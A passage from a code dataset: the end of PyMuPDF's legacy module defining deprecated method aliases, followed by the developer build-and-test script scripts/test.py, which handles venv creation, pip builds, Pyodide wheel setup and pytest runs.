_alias(fitz_old.Document, "pageXref", "page_xref")
_alias(fitz_old.Document, "PDFCatalog", "pdf_catalog")
_alias(fitz_old.Document, "PDFTrailer", "pdf_trailer")
_alias(fitz_old.Document, "previousLocation", "prev_location")
_alias(fitz_old.Document, "resolveLink", "resolve_link")
_alias(fitz_old.Document, "searchPageFor", "search_page_for")
_alias(fitz_old.Document, "setLanguage", "set_language")
_alias(fitz_old.Document, "setMetadata", "set_metadata")
_alias(fitz_old.Document, "setToC", "set_toc")
_alias(fitz_old.Document, "setXmlMetadata", "set_xml_metadata")
_alias(fitz_old.Document, "updateObject", "update_object")
_alias(fitz_old.Document, "updateStream", "update_stream")
_alias(fitz_old.Document, "xrefLength", "xref_length")
_alias(fitz_old.Document, "xrefObject", "xref_object")
_alias(fitz_old.Document, "xrefStream", "xref_stream")
_alias(fitz_old.Document, "xrefStreamRaw", "xref_stream_raw")
# deprecated Page aliases
_alias(fitz_old.Page, "_isWrapped", "is_wrapped")
_alias(fitz_old.Page, "addCaretAnnot", "add_caret_annot")
_alias(fitz_old.Page, "addCircleAnnot", "add_circle_annot")
_alias(fitz_old.Page, "addFileAnnot", "add_file_annot")
_alias(fitz_old.Page, "addFreetextAnnot", "add_freetext_annot")
_alias(fitz_old.Page, "addHighlightAnnot", "add_highlight_annot")
_alias(fitz_old.Page, "addInkAnnot", "add_ink_annot")
_alias(fitz_old.Page, "addLineAnnot", "add_line_annot")
_alias(fitz_old.Page, "addPolygonAnnot", "add_polygon_annot")
_alias(fitz_old.Page, "addPolylineAnnot", "add_polyline_annot")
_alias(fitz_old.Page, "addRectAnnot", "add_rect_annot")
_alias(fitz_old.Page, "addRedactAnnot", "add_redact_annot")
_alias(fitz_old.Page, "addSquigglyAnnot", "add_squiggly_annot")
_alias(fitz_old.Page, "addStampAnnot", "add_stamp_annot")
_alias(fitz_old.Page, "addStrikeoutAnnot", "add_strikeout_annot")
_alias(fitz_old.Page, "addTextAnnot", "add_text_annot")
_alias(fitz_old.Page, "addUnderlineAnnot", "add_underline_annot")
_alias(fitz_old.Page, "addWidget", "add_widget")
_alias(fitz_old.Page, "cleanContents", "clean_contents")
_alias(fitz_old.Page, "CropBox", "cropbox")
_alias(fitz_old.Page, "CropBoxPosition", "cropbox_position")
_alias(fitz_old.Page, "deleteAnnot", "delete_annot")
_alias(fitz_old.Page, "deleteLink", "delete_link")
_alias(fitz_old.Page, "deleteWidget", "delete_widget")
_alias(fitz_old.Page, "derotationMatrix", "derotation_matrix")
_alias(fitz_old.Page, "drawBezier", "draw_bezier")
_alias(fitz_old.Page, "drawCircle", "draw_circle")
_alias(fitz_old.Page, "drawCurve", "draw_curve")
_alias(fitz_old.Page, "drawLine", "draw_line")
_alias(fitz_old.Page, "drawOval", "draw_oval")
_alias(fitz_old.Page, "drawPolyline", "draw_polyline")
_alias(fitz_old.Page, "drawQuad", "draw_quad")
_alias(fitz_old.Page, "drawRect", "draw_rect")
_alias(fitz_old.Page, "drawSector", "draw_sector")
_alias(fitz_old.Page, "drawSquiggle", "draw_squiggle")
_alias(fitz_old.Page, "drawZigzag", "draw_zigzag")
_alias(fitz_old.Page, "firstAnnot", "first_annot")
_alias(fitz_old.Page, "firstLink", "first_link")
_alias(fitz_old.Page, "firstWidget", "first_widget")
_alias(fitz_old.Page, "getContents", "get_contents")
_alias(fitz_old.Page, "getDisplayList", "get_displaylist")
_alias(fitz_old.Page, "getDrawings", "get_drawings")
_alias(fitz_old.Page, "getFontList", "get_fonts")
_alias(fitz_old.Page, "getImageBbox", "get_image_bbox")
_alias(fitz_old.Page, "getImageList", "get_images")
_alias(fitz_old.Page, "getLinks", "get_links")
_alias(fitz_old.Page, "getPixmap", "get_pixmap")
_alias(fitz_old.Page, "getSVGimage", "get_svg_image")
_alias(fitz_old.Page, "getText", "get_text")
_alias(fitz_old.Page, "getTextBlocks", "get_text_blocks")
_alias(fitz_old.Page, "getTextbox", "get_textbox")
_alias(fitz_old.Page, "getTextPage", "get_textpage")
_alias(fitz_old.Page, "getTextWords", "get_text_words")
_alias(fitz_old.Page, "insertFont", "insert_font")
_alias(fitz_old.Page, "insertImage", "insert_image")
_alias(fitz_old.Page, "insertLink", "insert_link")
_alias(fitz_old.Page, "insertText", "insert_text")
_alias(fitz_old.Page, "insertTextbox", "insert_textbox")
_alias(fitz_old.Page, "loadAnnot", "load_annot")
_alias(fitz_old.Page, "loadLinks", "load_links")
_alias(fitz_old.Page, "MediaBox", "mediabox")
_alias(fitz_old.Page, "MediaBoxSize", "mediabox_size")
_alias(fitz_old.Page, "newShape", "new_shape")
_alias(fitz_old.Page, "readContents", "read_contents")
_alias(fitz_old.Page, "rotationMatrix", "rotation_matrix")
_alias(fitz_old.Page, "searchFor", "search_for")
_alias(fitz_old.Page, "setCropBox", "set_cropbox")
_alias(fitz_old.Page, "setMediaBox", "set_mediabox")
_alias(fitz_old.Page, "setRotation", "set_rotation")
_alias(fitz_old.Page, "showPDFpage", "show_pdf_page")
_alias(fitz_old.Page, "transformationMatrix", "transformation_matrix")
_alias(fitz_old.Page, "updateLink", "update_link")
_alias(fitz_old.Page, "wrapContents", "wrap_contents")
_alias(fitz_old.Page, "writeText", "write_text")
# deprecated Shape aliases
_alias(fitz_old.utils.Shape, "drawBezier", "draw_bezier")
_alias(fitz_old.utils.Shape, "drawCircle", "draw_circle")
_alias(fitz_old.utils.Shape, "drawCurve", "draw_curve")
_alias(fitz_old.utils.Shape, "drawLine", "draw_line")
_alias(fitz_old.utils.Shape, "drawOval", "draw_oval")
_alias(fitz_old.utils.Shape, "drawPolyline", "draw_polyline")
_alias(fitz_old.utils.Shape, "drawQuad", "draw_quad")
_alias(fitz_old.utils.Shape, "drawRect", "draw_rect")
_alias(fitz_old.utils.Shape, "drawSector", "draw_sector")
_alias(fitz_old.utils.Shape, "drawSquiggle", "draw_squiggle")
_alias(fitz_old.utils.Shape, "drawZigzag", "draw_zigzag")
_alias(fitz_old.utils.Shape, "insertText", "insert_text")
_alias(fitz_old.utils.Shape, "insertTextbox", "insert_textbox")
# deprecated Annot aliases
_alias(fitz_old.Annot, "getText", "get_text")
_alias(fitz_old.Annot, "getTextbox", "get_textbox")
_alias(fitz_old.Annot, "fileGet", "get_file")
_alias(fitz_old.Annot, "fileUpd", "update_file")
_alias(fitz_old.Annot, "getPixmap", "get_pixmap")
_alias(fitz_old.Annot, "getTextPage", "get_textpage")
_alias(fitz_old.Annot, "lineEnds", "line_ends")
_alias(fitz_old.Annot, "setBlendMode", "set_blendmode")
_alias(fitz_old.Annot, "setBorder", "set_border")
_alias(fitz_old.Annot, "setColors", "set_colors")
_alias(fitz_old.Annot, "setFlags", "set_flags")
_alias(fitz_old.Annot, "setInfo", "set_info")
_alias(fitz_old.Annot, "setLineEnds", "set_line_ends")
_alias(fitz_old.Annot, "setName", "set_name")
_alias(fitz_old.Annot, "setOpacity", "set_opacity")
_alias(fitz_old.Annot, "setRect", "set_rect")
_alias(fitz_old.Annot, "setOC", "set_oc")
_alias(fitz_old.Annot, "soundGet", "get_sound")
# deprecated TextWriter aliases
_alias(fitz_old.TextWriter, "writeText", "write_text")
_alias(fitz_old.TextWriter, "fillTextbox", "fill_textbox")
# deprecated DisplayList aliases
_alias(fitz_old.DisplayList, "getPixmap", "get_pixmap")
_alias(fitz_old.DisplayList, "getTextPage", "get_textpage")
# deprecated Pixmap aliases
_alias(fitz_old.Pixmap, "setAlpha", "set_alpha")
_alias(fitz_old.Pixmap, "gammaWith", "gamma_with")
_alias(fitz_old.Pixmap, "tintWith", "tint_with")
_alias(fitz_old.Pixmap, "clearWith", "clear_with")
_alias(fitz_old.Pixmap, "copyPixmap", "copy")
_alias(fitz_old.Pixmap, "getImageData", "tobytes")
_alias(fitz_old.Pixmap, "getPNGData", "tobytes")
_alias(fitz_old.Pixmap, "getPNGdata", "tobytes")
_alias(fitz_old.Pixmap, "writeImage", "save")
_alias(fitz_old.Pixmap, "writePNG", "save")
_alias(fitz_old.Pixmap, "pillowWrite", "pil_save")
_alias(fitz_old.Pixmap, "pillowData", "pil_tobytes")
_alias(fitz_old.Pixmap, "invertIRect", "invert_irect")
_alias(fitz_old.Pixmap, "setPixel", "set_pixel")
_alias(fitz_old.Pixmap, "setOrigin", "set_origin")
_alias(fitz_old.Pixmap, "setRect", "set_rect")
_alias(fitz_old.Pixmap, "setResolution", "set_dpi")
# deprecated geometry aliases
_alias(fitz_old.Rect, "getArea", "get_area")
_alias(fitz_old.IRect, "getArea", "get_area")
_alias(fitz_old.Rect, "getRectArea", "get_area")
_alias(fitz_old.IRect, "getRectArea", "get_area")
_alias(fitz_old.Rect, "includePoint", "include_point")
_alias(fitz_old.IRect, "includePoint", "include_point")
_alias(fitz_old.Rect, "includeRect", "include_rect")
_alias(fitz_old.IRect, "includeRect", "include_rect")
_alias(fitz_old.Rect, "isInfinite", "is_infinite")
_alias(fitz_old.IRect, "isInfinite", "is_infinite")
_alias(fitz_old.Rect, "isEmpty", "is_empty")
_alias(fitz_old.IRect, "isEmpty", "is_empty")
_alias(fitz_old.Quad, "isEmpty", "is_empty")
_alias(fitz_old.Quad, "isRectangular", "is_rectangular")
_alias(fitz_old.Quad, "isConvex", "is_convex")
_alias(fitz_old.Matrix, "isRectilinear", "is_rectilinear")
_alias(fitz_old.Matrix, "preRotate", "prerotate")
_alias(fitz_old.Matrix, "preScale", "prescale")
_alias(fitz_old.Matrix, "preShear", "preshear")
_alias(fitz_old.Matrix, "preTranslate", "pretranslate")
# deprecated other aliases
_alias(fitz_old.Outline, "isExternal", "is_external")
_alias(fitz_old.Outline, "isOpen", "is_open")
_alias(fitz_old.Link, "isExternal", "is_external")
_alias(fitz_old.Link, "setBorder", "set_border")
_alias(fitz_old.Link, "setColors", "set_colors")
_alias(fitz, "getPDFstr", "get_pdf_str")
_alias(fitz, "getPDFnow", "get_pdf_now")
_alias(fitz, "PaperSize", "paper_size")
_alias(fitz, "PaperRect", "paper_rect")
_alias(fitz, "paperSizes", "paper_sizes")
_alias(fitz, "ImageProperties", "image_profile")
_alias(fitz, "planishLine", "planish_line")
_alias(fitz, "getTextLength", "get_text_length")
_alias(fitz, "getTextlength", "get_text_length")
fitz_old.__doc__ = """
PyMuPDF %s: Python bindings for the MuPDF %s library.
Version date: %s.
Built for Python %i.%i on %s (%i-bit).
""" % (
fitz_old.VersionBind,
fitz_old.VersionFitz,
fitz_old.VersionDate,
sys.version_info[0],
sys.version_info[1],
sys.platform,
64 if sys.maxsize > 2**32 else 32,
)
if VersionBind.startswith("1.19"): # don't generate aliases after v1.19.*
restore_aliases()
pdfcolor = dict(
[
(k, (r / 255, g / 255, b / 255))
for k, (r, g, b) in fitz_old.utils.getColorInfoDict().items()
]
)
__version__ = fitz_old.VersionBind
| 23,545 | Python | .py | 460 | 46.658696 | 104 | 0.661921 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,381 | test.py | pymupdf_PyMuPDF/scripts/test.py | #! /usr/bin/env python3
'''Developer build/test script for PyMuPDF.
Examples:
./PyMuPDF/scripts/test.py --mupdf mupdf buildtest
Build and test with pre-existing local mupdf/ checkout.
./PyMuPDF/scripts/test.py buildtest
Build and test with default internal download of mupdf.
./PyMuPDF/scripts/test.py --mupdf 'git:https://git.ghostscript.com/mupdf.git' buildtest
Build and test with internal checkout of mupdf master.
./PyMuPDF/scripts/test.py --mupdf 'git:--branch 1.24.x https://github.com/ArtifexSoftware/mupdf.git' buildtest
Build and test using internal checkout of mupdf 1.24.x branch from Github.
Usage:
scripts/test.py <options> <command(s)>
* Commands are handled in order, so for example `build` should usually be
before `test`.
* If we are not already running inside a Python venv, we automatically create a
venv and re-run ourselves inside it.
* We build directly with pip (unlike gh_release.py, which builds with
cibuildwheel).
* We run tests with pytest.
* One can generate call traces by setting environment variables in debug
builds. For details see:
https://mupdf.readthedocs.io/en/latest/language-bindings.html#environmental-variables
Options:
--help
-h
Show help.
-b <build>
Set build type for `build` or `buildtest` commands. `<build>` should
be one of 'release', 'debug', 'memento'. [This makes `build` set
environment variable `PYMUPDF_SETUP_MUPDF_BUILD_TYPE`, which is used by
PyMuPDF's `setup.py`.]
-d
Equivalent to `--build-type debug`.
-f 0|1
If 1 we also test alias `fitz` as well as `pymupdf`. Default is '0'.
-i <implementations>
Set PyMuPDF implementations to test.
<implementations> must contain only these individual characters:
'r' - rebased.
'R' - rebased without optimisations.
Default is 'r'. Also see `PyMuPDF:tests/run_compound.py`.
-k <expression>
Select which test(s) to run; passed straight through to pytest's `-k`.
-m <location> | --mupdf <location>
Location of local mupdf/ directory or 'git:...' to be used
when building PyMuPDF. [This sets environment variable
PYMUPDF_SETUP_MUPDF_BUILD, which is used by PyMuPDF/setup.py. If not
specified PyMuPDF will download its default mupdf .tgz.]
-p <pytest-options>
Set pytest options; default is ''.
-s 0 | 1
If 1 (the default), build with Python Limited API/Stable ABI.
-t <names>
Pytest test names, comma-separated. Should be relative to PyMuPDF
directory. For example:
-t tests/test_general.py
-t tests/test_general.py::test_subset_fonts.
To specify multiple tests, use comma-separated list and/or multiple `-t
<names>` args.
-v 0|1|2
0 - do not use a venv.
1 - Use venv. If it already exists, we assume the existing directory
was created by us earlier and is a valid venv containing all
necessary packages; this saves a little time.
2 - use venv.
The default is 2.
--build-isolation 0|1
If true (the default on non-OpenBSD systems), we let pip create and use
its own new venv to build PyMuPDF. Otherwise we force pip to use the
current venv.
--build-flavour <build_flavour>
Combination of 'p', 'b', 'd'. See ../setup.py's description of
PYMUPDF_SETUP_FLAVOUR. Default is 'pb', i.e. self-contained PyMuPDF
wheels without MuPDF build-time files.
--build-mupdf 0|1
Whether to rebuild mupdf when we build PyMuPDF. Default is 1.
--gdb 0|1
Run tests under gdb.
--system-site-packages 0|1
If 1, use `--system-site-packages` when creating venv.
--timeout <seconds>
Sets timeout when running tests.
--valgrind 0|1
Use valgrind in `test` or `buildtest`.
This will run `sudo apt update` and `sudo apt install valgrind`.
Commands:
build
Builds and installs PyMuPDF into venv, using `pip install .../PyMuPDF`.
buildtest
Same as 'build test'.
test
Runs PyMuPDF's pytest tests in venv. Default is to test rebased and
unoptimised rebased; use `-i` to change this.
wheel
Build wheel.
pyodide_wheel
Build Pyodide wheel. We clone `emsdk.git`, set it up, and run
`pyodide build`. This runs our setup.py with CC etc set up
to create Pyodide binaries in a wheel called, for example,
`PyMuPDF-1.23.2-cp311-none-emscripten_3_1_32_wasm32.whl`.
Environment:
PYMUDF_SCRIPTS_TEST_options
Is prepended to command line args.
'''
import gh_release
import glob
import os
import platform
import re
import shlex
import subprocess
import sys
import textwrap
pymupdf_dir = os.path.abspath( f'{__file__}/../..')
def main(argv):
if github_workflow_unimportant():
return
if len(argv) == 1:
show_help()
return
build_isolation = None
valgrind = False
s = True
build_do = 'i'
build_type = None
build_mupdf = True
build_flavour = 'pb'
gdb = False
test_fitz = False
implementations = 'r'
test_names = list()
venv = 2
pytest_options = None
timeout = None
pytest_k = None
system_site_packages = False
options = os.environ.get('PYMUDF_SCRIPTS_TEST_options', '')
options = shlex.split(options)
args = iter(options + argv[1:])
i = 0
while 1:
try:
arg = next(args)
except StopIteration:
arg = None
break
if not arg.startswith('-'):
break
elif arg == '-b':
build_type = next(args)
elif arg == '--build-isolation':
build_isolation = int(next(args))
elif arg == '-d':
build_type = 'debug'
elif arg == '-f':
test_fitz = int(next(args))
elif arg in ('-h', '--help'):
show_help()
return
elif arg == '-i':
implementations = next(args)
elif arg in ('--mupdf', '-m'):
mupdf = next(args)
if not mupdf.startswith('git:') and mupdf != '-':
assert os.path.isdir(mupdf), f'Not a directory: {mupdf=}.'
mupdf = os.path.abspath(mupdf)
os.environ['PYMUPDF_SETUP_MUPDF_BUILD'] = mupdf
elif arg == '-k':
pytest_k = next(args)
elif arg == '-p':
pytest_options = next(args)
elif arg == '-s':
value = next(args)
assert value in ('0', '1'), f'`-s` must be followed by `0` or `1`, not {value=}.'
os.environ['PYMUPDF_SETUP_PY_LIMITED_API'] = value
elif arg == '--system-site-packages':
system_site_packages = int(next(args))
elif arg == '-t':
test_names += next(args).split(',')
elif arg == '--timeout':
timeout = float(next(args))
elif arg == '-v':
venv = int(next(args))
elif arg == '--build-flavour':
build_flavour = next(args)
elif arg == '--build-mupdf':
build_mupdf = int(next(args))
elif arg == '--gdb':
gdb = int(next(args))
elif arg == '--valgrind':
valgrind = int(next(args))
else:
assert 0, f'Unrecognised option: {arg=}.'
if arg is None:
log(f'No command specified.')
return
commands = list()
while 1:
assert arg in ('build', 'buildtest', 'test', 'wheel', 'pyodide_wheel'), \
f'Unrecognised command: {arg=}.'
commands.append(arg)
try:
arg = next(args)
except StopIteration:
break
venv_quick = (venv==1)
# Run inside a venv.
if venv and sys.prefix == sys.base_prefix:
# We are not running in a venv.
log(f'Re-running in venv {gh_release.venv_name!r}.')
gh_release.venv(
['python'] + argv,
quick=venv_quick,
system_site_packages=system_site_packages,
)
return
def do_build(wheel=False):
build(
build_type=build_type,
build_isolation=build_isolation,
venv_quick=venv_quick,
build_mupdf=build_mupdf,
build_flavour=build_flavour,
wheel=wheel,
)
def do_test():
test(
implementations=implementations,
valgrind=valgrind,
venv_quick=venv_quick,
test_names=test_names,
pytest_options=pytest_options,
timeout=timeout,
gdb=gdb,
test_fitz=test_fitz,
pytest_k=pytest_k,
)
for command in commands:
if 0:
pass
elif command == 'build':
do_build()
elif command == 'test':
do_test()
elif command == 'buildtest':
do_build()
do_test()
elif command == 'wheel':
do_build(wheel=True)
elif command == 'pyodide_wheel':
build_pyodide_wheel()
else:
assert 0
def get_env_bool(name, default=0):
v = os.environ.get(name)
if v in ('1', 'true'):
return 1
elif v in ('0', 'false'):
return 0
elif v is None:
return default
else:
assert 0, f'Bad environ {name=} {v=}'
def show_help():
print(__doc__)
print(venv_info())
def github_workflow_unimportant():
'''
Returns true if we are running a Github scheduled workflow but in a
repository not called 'PyMuPDF'. This can be used to avoid consuming
unnecessary Github minutes running workflows on non-main repositories such
as ArtifexSoftware/PyMuPDF-julian.
'''
GITHUB_EVENT_NAME = os.environ.get('GITHUB_EVENT_NAME')
GITHUB_REPOSITORY = os.environ.get('GITHUB_REPOSITORY')
if GITHUB_EVENT_NAME == 'schedule' and GITHUB_REPOSITORY != 'pymupdf/PyMuPDF':
log(f'## This is an unimportant Github workflow: a scheduled event, not in the main repository `pymupdf/PyMuPDF`.')
log(f'## {GITHUB_EVENT_NAME=}.')
log(f'## {GITHUB_REPOSITORY=}.')
return True
def venv_info(pytest_args=None):
'''
Returns string containing information about the venv we use and how to
run tests manually. If specified, `pytest_args` contains the pytest args,
otherwise we use an example.
'''
pymupdf_dir_rel = gh_release.relpath(pymupdf_dir)
ret = f'Name of venv: {gh_release.venv_name}\n'
if pytest_args is None:
pytest_args = f'{pymupdf_dir_rel}/tests/test_general.py::test_subset_fonts'
if platform.system() == 'Windows':
ret += textwrap.dedent(f'''
Rerun tests manually with rebased implementation:
Enter venv:
{gh_release.venv_name}\\Scripts\\activate
Run specific test in venv:
{gh_release.venv_name}\\Scripts\\python -m pytest {pytest_args}
''')
else:
ret += textwrap.dedent(f'''
Rerun tests manually with rebased implementation:
Enter venv and run specific test, also under gdb:
. {gh_release.venv_name}/bin/activate
python -m pytest {pytest_args}
gdb --args python -m pytest {pytest_args}
Run without explicitly entering venv, also under gdb:
./{gh_release.venv_name}/bin/python -m pytest {pytest_args}
gdb --args ./{gh_release.venv_name}/bin/python -m pytest {pytest_args}
''')
return ret
def build(
build_type=None,
build_isolation=None,
venv_quick=False,
build_mupdf=True,
build_flavour='pb',
wheel=False,
):
'''
Args:
build_type:
See top-level option `-b`.
build_isolation:
See top-level option `--build-isolation`.
venv_quick:
See top-level option `-v`.
build_mupdf:
See top-level option `build-mupdf`
'''
print(f'{build_type=}')
print(f'{build_isolation=}')
if build_isolation is None:
# On OpenBSD libclang is not available on pypi.org, so we need to force
# use of system package py3-llvm with --no-build-isolation, manually
# installing other required packages.
build_isolation = False if platform.system() == 'OpenBSD' else True
if build_isolation:
# This is the default on non-OpenBSD.
build_isolation_text = ''
else:
# Not using build isolation - i.e. pip will not be using its own clean
# venv, so we need to explicitly install required packages. Manually
# install required packages from pyproject.toml.
sys.path.insert(0, os.path.abspath(f'{__file__}/../..'))
import setup
names = setup.get_requires_for_build_wheel()
del sys.path[0]
if names:
names = ' '.join(names)
if venv_quick:
log(f'{venv_quick=}: Not installing packages with pip: {names}')
else:
gh_release.run( f'python -m pip install --upgrade {names}')
build_isolation_text = ' --no-build-isolation'
env_extra = dict()
if not build_mupdf:
env_extra['PYMUPDF_SETUP_MUPDF_REBUILD'] = '0'
if build_type:
env_extra['PYMUPDF_SETUP_MUPDF_BUILD_TYPE'] = build_type
if build_flavour:
env_extra['PYMUPDF_SETUP_FLAVOUR'] = build_flavour
if wheel:
gh_release.run(f'pip wheel{build_isolation_text} -v {pymupdf_dir}', env_extra=env_extra)
else:
gh_release.run(f'pip install{build_isolation_text} -v {pymupdf_dir}', env_extra=env_extra)
def build_pyodide_wheel():
'''
Build Pyodide wheel.
This runs `pyodide build` inside the PyMuPDF directory, which in turn runs
setup.py in a Pyodide build environment.
'''
log(f'## Building Pyodide wheel.')
# Our setup.py does not know anything about Pyodide; we set a few
# required environmental variables here.
#
env_extra = dict()
# Disable libcrypto because not available in Pyodide.
env_extra['HAVE_LIBCRYPTO'] = 'no'
# Tell MuPDF to build for Pyodide.
env_extra['OS'] = 'pyodide'
# Build a single wheel without a separate PyMuPDFb wheel.
env_extra['PYMUPDF_SETUP_FLAVOUR'] = 'pb'
# 2023-08-30: We set PYMUPDF_SETUP_MUPDF_BUILD_TESSERACT=0 because
# otherwise mupdf thirdparty/tesseract/src/ccstruct/dppoint.cpp fails to
# build because `#include "errcode.h"` finds a header inside emsdk. This is
# pyodide bug https://github.com/pyodide/pyodide/issues/3839. It's fixed in
# https://github.com/pyodide/pyodide/pull/3866 but the fix has not reached
# pypi.org's pyodide-build package. E.g. currently in tag 0.23.4, but
# current devuan pyodide-build is pyodide_build-0.23.4.
#
env_extra['PYMUPDF_SETUP_MUPDF_TESSERACT'] = '0'
command = f'{pyodide_setup(pymupdf_dir)} && pyodide build --exports pyinit'
gh_release.run(command, env_extra=env_extra)
# Copy wheel into `wheelhouse/` so it is picked up as a workflow
# artifact.
#
gh_release.run(f'ls -l {pymupdf_dir}/dist/')
gh_release.run(f'mkdir -p {pymupdf_dir}/wheelhouse && cp -p {pymupdf_dir}/dist/* {pymupdf_dir}/wheelhouse/')
gh_release.run(f'ls -l {pymupdf_dir}/wheelhouse/')
def pyodide_setup(directory, clean=False):
'''
Returns a command that will set things up for a pyodide build.
Args:
directory:
Our command cd's into this directory.
clean:
If true we create an entirely new environment. Otherwise
we reuse any existing emsdk repository and venv.
* Clone emsdk repository to `pipcl_emsdk` if not already present.
* Create and activate a venv `pipcl_venv_pyodide` if not already present.
* Install/upgrade package `pyodide-build`.
* Run emsdk install scripts and enter emsdk environment.
* Replace emsdk/upstream/bin/wasm-opt
(https://github.com/pyodide/pyodide/issues/4048).
Example usage in a build function:
command = pipcl_wasm.pyodide_setup()
command += ' && pyodide build --exports pyinit'
subprocess.run(command, shell=1, check=1)
'''
command = f'cd {directory}'
# Clone emsdk.
#
dir_emsdk = 'emsdk'
if clean:
shutil.rmtree(dir_emsdk, ignore_errors=1)
# 2024-06-25: old `.pyodide-xbuildenv` directory was breaking build, so
# important to remove it here.
shutil.rmtree('.pyodide-xbuildenv', ignore_errors=1)
if not os.path.exists(f'{directory}/{dir_emsdk}'):
command += f' && echo "### cloning emsdk.git"'
command += f' && git clone https://github.com/emscripten-core/emsdk.git {dir_emsdk}'
# Create and enter Python venv.
#
# 2024-10-11: we only work with python-3.11; later versions fail with
# pyodide-build==0.23.4 because `distutils` not available.
venv_pyodide = 'venv_pyodide_3.11'
python = sys.executable
if sys.version_info[:2] != (3, 11):
log(f'Forcing use of python-3.11 because {sys.version=} is not 3.11.')
python = 'python3.11'
if not os.path.exists( f'{directory}/{venv_pyodide}'):
command += f' && echo "### creating venv {venv_pyodide}"'
command += f' && {python} -m venv {venv_pyodide}'
command += f' && . {venv_pyodide}/bin/activate'
command += f' && echo "### running pip install ..."'
command += f' && python -m pip install --upgrade pip wheel pyodide-build==0.23.4'
#command += f' && python -m pip install --upgrade pip wheel pyodide-build'
# Run emsdk install scripts and enter emsdk environment.
#
command += f' && cd {dir_emsdk}'
command += ' && PYODIDE_EMSCRIPTEN_VERSION=$(pyodide config get emscripten_version)'
command += ' && echo "### running ./emsdk install"'
command += ' && ./emsdk install ${PYODIDE_EMSCRIPTEN_VERSION}'
command += ' && echo "### running ./emsdk activate"'
command += ' && ./emsdk activate ${PYODIDE_EMSCRIPTEN_VERSION}'
command += ' && echo "### running ./emsdk_env.sh"'
command += ' && . ./emsdk_env.sh' # Need leading `./` otherwise weird 'Not found' error.
if 1:
# Make our returned command replace emsdk/upstream/bin/wasm-opt
# with a script that does nothing, otherwise the linker
# command fails after it has created the output file. See:
# https://github.com/pyodide/pyodide/issues/4048
#
def write( text, path):
with open( path, 'w') as f:
f.write( text)
os.chmod( path, 0o755)
# Create a script that our command runs, that overwrites
# `emsdk/upstream/bin/wasm-opt`, hopefully in a way that is
# idempotent.
#
# The script moves the original wasm-opt to wasm-opt-0.
#
write(
textwrap.dedent('''
#! /usr/bin/env python3
import os
p = 'upstream/bin/wasm-opt'
p0 = 'upstream/bin/wasm-opt-0'
p1 = '../wasm-opt-1'
if os.path.exists( p0):
print(f'### {__file__}: {p0!r} already exists so not overwriting from {p!r}.')
else:
s = os.stat( p)
assert s.st_size > 15000000, f'File smaller ({s.st_size}) than expected: {p!r}'
print(f'### {__file__}: Moving {p!r} -> {p0!r}.')
os.rename( p, p0)
print(f'### {__file__}: Moving {p1!r} -> {p!r}.')
os.rename( p1, p)
'''
).strip(),
f'{directory}/wasm-opt-replace.py',
)
# Create a wasm-opt script that basically does nothing, except
# defers to the original script when run with `--version`.
#
write(
textwrap.dedent('''
#!/usr/bin/env python3
import os
import sys
import subprocess
if sys.argv[1:] == ['--version']:
root = os.path.dirname(__file__)
subprocess.run(f'{root}/wasm-opt-0 --version', shell=1, check=1)
else:
print(f'{__file__}: Doing nothing. {sys.argv=}')
'''
).strip(),
f'{directory}/wasm-opt-1',
)
command += ' && ../wasm-opt-replace.py'
command += ' && cd ..'
return command
def test(
implementations,
valgrind,
venv_quick=False,
test_names=None,
pytest_options=None,
timeout=None,
gdb=False,
test_fitz=True,
pytest_k=None
):
'''
Args:
implementations:
See top-level option `-i`.
valgrind:
See top-level option `--valgrind`.
venv_quick:
.
test_names:
See top-level option `-t`.
pytest_options:
See top-level option `-p`.
gdb:
See top-level option `--gdb`.
test_fitz:
See top-level option `-f`.
'''
pymupdf_dir_rel = gh_release.relpath(pymupdf_dir)
if pytest_options is None:
if valgrind:
pytest_options = '-s -vv'
else:
pytest_options = ''
if pytest_k:
pytest_options += f' -k {shlex.quote(pytest_k)}'
pytest_arg = ''
if test_names:
for test_name in test_names:
pytest_arg += f' {pymupdf_dir_rel}/{test_name}'
else:
pytest_arg += f' {pymupdf_dir_rel}'
python = gh_release.relpath(sys.executable)
log('Running tests with tests/run_compound.py and pytest.')
try:
if venv_quick:
log(f'{venv_quick=}: Not installing test packages: {gh_release.test_packages}')
else:
gh_release.run(f'pip install --upgrade {gh_release.test_packages}')
run_compound_args = ''
if implementations:
run_compound_args += f' -i {implementations}'
if timeout:
run_compound_args += f' -t {timeout}'
env_extra = None
if valgrind:
log('Installing valgrind.')
gh_release.run(f'sudo apt update')
gh_release.run(f'sudo apt install --upgrade valgrind')
gh_release.run(f'valgrind --version')
log('Running PyMuPDF tests under valgrind.')
command = (
f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args}'
f' valgrind --suppressions={pymupdf_dir_rel}/valgrind.supp --error-exitcode=100 --errors-for-leak-kinds=none --fullpath-after='
f' {python} -m pytest {pytest_options}{pytest_arg}'
)
env_extra=dict(
PYTHONMALLOC='malloc',
PYMUPDF_RUNNING_ON_VALGRIND='1',
)
elif gdb:
command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} gdb --args {python} -m pytest {pytest_options} {pytest_arg}'
elif platform.system() == 'Windows':
# `python -m pytest` doesn't seem to work.
command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} pytest {pytest_options} {pytest_arg}'
else:
# On OpenBSD `pip install pytest` doesn't seem to install the pytest
# command, so we use `python -m pytest ...`.
command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} {python} -m pytest {pytest_options} {pytest_arg}'
# Always start by removing any test_*_fitz.py files.
for p in glob.glob(f'{pymupdf_dir_rel}/tests/test_*_fitz.py'):
print(f'Removing {p=}')
os.remove(p)
if test_fitz:
# Create copies of each test file, modified to use `pymupdf`
# instead of `fitz`.
for p in glob.glob(f'{pymupdf_dir_rel}/tests/test_*.py'):
if os.path.basename(p).startswith('test_fitz_'):
# Don't recursively generate test_fitz_fitz_foo.py,
# test_fitz_fitz_fitz_foo.py, ... etc.
continue
branch, leaf = os.path.split(p)
p2 = f'{branch}/{leaf[:5]}fitz_{leaf[5:]}'
print(f'Converting {p=} to {p2=}.')
with open(p, encoding='utf8') as f:
text = f.read()
text2 = re.sub("([^\'])\\bpymupdf\\b", '\\1fitz', text)
if p.replace(os.sep, '/') == f'{pymupdf_dir_rel}/tests/test_docs_samples.py'.replace(os.sep, '/'):
assert text2 == text
else:
assert text2 != text, f'Unexpectedly unchanged when creating {p!r} => {p2!r}'
with open(p2, 'w', encoding='utf8') as f:
f.write(text2)
